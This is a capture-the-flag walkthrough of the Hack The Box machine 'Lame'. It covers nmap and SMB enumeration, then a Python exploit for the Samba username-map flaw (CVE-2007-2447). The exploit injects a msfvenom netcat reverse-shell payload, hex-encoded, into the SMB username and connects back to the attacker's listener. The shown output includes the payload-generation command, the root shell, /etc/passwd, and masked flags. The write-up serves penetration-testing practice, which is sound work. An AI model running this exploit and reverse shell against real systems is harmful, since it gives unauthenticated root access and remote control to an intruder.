Lame
Introduction:
This is a extremely simple machine based on a very old CVE (2007-2447) with SMB service and the exploit for this vulnerability is readily available at - https://www.exploit-db.com/exploits/16320/ .
You can either do this machine with the metasploit module but since OffSec discourages the use of this in OSCP, its better to do it manually by modifying the exploit yourself.
Recon
1# nmap -sS -sV -sC -T4 -oN nmap.lame.txt 10.10.10.3
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-12 09:29 EST
3Nmap scan report for 10.10.10.3
4Host is up (0.019s latency).
5Not shown: 996 filtered ports
6PORT STATE SERVICE VERSION
721/tcp open ftp vsftpd 2.3.4
8|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
9| ftp-syst:
10| STAT:
11| FTP server status:
12| Connected to 10.10.14.25
13| Logged in as ftp
14| TYPE: ASCII
15| No session bandwidth limit
16| Session timeout in seconds is 300
17| Control connection is plain text
18| Data connections will be plain text
19| vsFTPd 2.3.4 - secure, fast, stable
20|_End of status
2122/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
22| ssh-hostkey:
23| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
24|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
25139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
26445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
27Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
28
29Host script results:
30|_clock-skew: mean: 2h38m17s, deviation: 3h32m09s, median: 8m16s
31| smb-os-discovery:
32| OS: Unix (Samba 3.0.20-Debian)
33| Computer name: lame
34| NetBIOS computer name:
35| Domain name: hackthebox.gr
36| FQDN: lame.hackthebox.gr
37|_ System time: 2020-12-12T09:38:25-05:00
38| smb-security-mode:
39| account_used: <blank>
40| authentication_level: user
41| challenge_response: supported
42|_ message_signing: disabled (dangerous, but default)
43|_smb2-time: Protocol negotiation failed (SMB2)
44
45Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
46Nmap done: 1 IP address (1 host up) scanned in 56.87 seconds
47
Enumeration
1root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# smbmap -H 10.10.10.3
2[+] IP: 10.10.10.3:445 Name: 10.10.10.3
3 Disk Permissions Comment
4 ---- ----------- -------
5 print$ NO ACCESS Printer Drivers
6 tmp READ, WRITE oh noes!
7 opt NO ACCESS
8 IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
9 ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
10root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# smbclient //10.10.10.3/tmp -u guest
11protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
12root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# smbclient -L //10.10.10.3/ --option='client min protocol=NT1'
13Enter WORKGROUP\root's password:
14Anonymous login successful
15
16 Sharename Type Comment
17 --------- ---- -------
18 print$ Disk Printer Drivers
19 tmp Disk oh noes!
20 opt Disk
21 IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
22 ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
23
Look up the SMB vulberability based on the name and version.
After some google searches you will find scripts similar to one below -
source: https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851
You will have to modify the payload based on your IP and port configuration.
1#!/usr/bin/python
2
3from smb.SMBConnection import SMBConnection
4import random, string
5from smb import smb_structs
6smb_structs.SUPPORT_SMB2 = False
7import sys
8
9
10# Just a python version of a very simple Samba exploit.
11# It doesn't have to be pretty because the shellcode is executed
12# in the username field.
13
14# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
15
16# Configured SMB connection options with info from here:
17# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
18
19# Use the commandline argument as the target:
20if len(sys.argv) < 2:
21 print "\nUsage: " + sys.argv[0] + " <HOST>\n"
22 sys.exit()
23
24
25# Shellcode:
26# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
27
28buf = b""
29buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x63"
30buf += b"\x61\x69\x69\x78\x6f\x61\x3b\x20\x6e\x63\x20\x31\x30"
31buf += b"\x2e\x31\x30\x2e\x31\x34\x2e\x32\x35\x20\x39\x39\x39"
32buf += b"\x39\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x63\x61\x69\x69"
33buf += b"\x78\x6f\x61\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68"
34buf += b"\x20\x3e\x2f\x74\x6d\x70\x2f\x63\x61\x69\x69\x78\x6f"
35buf += b"\x61\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74"
36buf += b"\x6d\x70\x2f\x63\x61\x69\x69\x78\x6f\x61"
37
38username = "/=`nohup " + buf + "`"
39password = ""
40conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
41assert conn.connect(sys.argv[1], 445)
42
43
Shellcode was generated using -
1$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.25 LPORT=9999 -f python
2[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
3[-] No arch selected, selecting arch: cmd from the payload
4No encoder specified, outputting raw payload
5Payload size: 101 bytes
6Final size of python file: 503 bytes
7buf = b""
8buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x63"
9buf += b"\x61\x69\x69\x78\x6f\x61\x3b\x20\x6e\x63\x20\x31\x30"
10buf += b"\x2e\x31\x30\x2e\x31\x34\x2e\x32\x35\x20\x39\x39\x39"
11buf += b"\x39\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x63\x61\x69\x69"
12buf += b"\x78\x6f\x61\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68"
13buf += b"\x20\x3e\x2f\x74\x6d\x70\x2f\x63\x61\x69\x69\x78\x6f"
14buf += b"\x61\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74"
15buf += b"\x6d\x70\x2f\x63\x61\x69\x69\x78\x6f\x61"
Catch the shell by starting a netcat lister on a separate terminal window, before you run the exploit.
1
2$ nc -lvnp 9999
3listening on [any] 9999 ...
4connect to [10.10.14.25] from (UNKNOWN) [10.10.10.3] 40781
5whoami
6root
7cd /root
8ls
9Desktop
10reset_logs.sh
11root.txt
12vnc.log
13cat root.txt
1445XXXXXXXXXXXXXXXXXX26864
You should be now root!
Checkout /etc/passwd to find out other system users and you will find a user called makis. The user flag is in the home directory as shown below -
1cat /etc/passwd
2root:x:0:0:root:/root:/bin/bash
3daemon:x:1:1:daemon:/usr/sbin:/bin/sh
4bin:x:2:2:bin:/bin:/bin/sh
5sys:x:3:3:sys:/dev:/bin/sh
6sync:x:4:65534:sync:/bin:/bin/sync
7games:x:5:60:games:/usr/games:/bin/sh
8man:x:6:12:man:/var/cache/man:/bin/sh
9lp:x:7:7:lp:/var/spool/lpd:/bin/sh
10mail:x:8:8:mail:/var/mail:/bin/sh
11news:x:9:9:news:/var/spool/news:/bin/sh
12uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
13proxy:x:13:13:proxy:/bin:/bin/sh
14www-data:x:33:33:www-data:/var/www:/bin/sh
15backup:x:34:34:backup:/var/backups:/bin/sh
16list:x:38:38:Mailing List Manager:/var/list:/bin/sh
17irc:x:39:39:ircd:/var/run/ircd:/bin/sh
18gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
19nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
20libuuid:x:100:101::/var/lib/libuuid:/bin/sh
21dhcp:x:101:102::/nonexistent:/bin/false
22syslog:x:102:103::/home/syslog:/bin/false
23klog:x:103:104::/home/klog:/bin/false
24sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
25bind:x:105:113::/var/cache/bind:/bin/false
26postfix:x:106:115::/var/spool/postfix:/bin/false
27ftp:x:107:65534::/home/ftp:/bin/false
28postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
29mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
30tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
31distccd:x:111:65534::/:/bin/false
32service:x:1002:1002:,,,:/home/service:/bin/bash
33telnetd:x:112:120::/nonexistent:/bin/false
34proftpd:x:113:65534::/var/run/proftpd:/bin/false
35statd:x:114:65534::/var/lib/nfs:/bin/false
36snmp:x:115:65534::/var/lib/snmp:/bin/false
37makis:x:1003:1003::/home/makis:/bin/sh
1cd /home/makis
2ls
3user.txt
4cat us
5cat: us: No such file or directory
6cat user.txt
7562XXXXXXXXXXXXXXXXXXXXXXXXXXXXe2a
1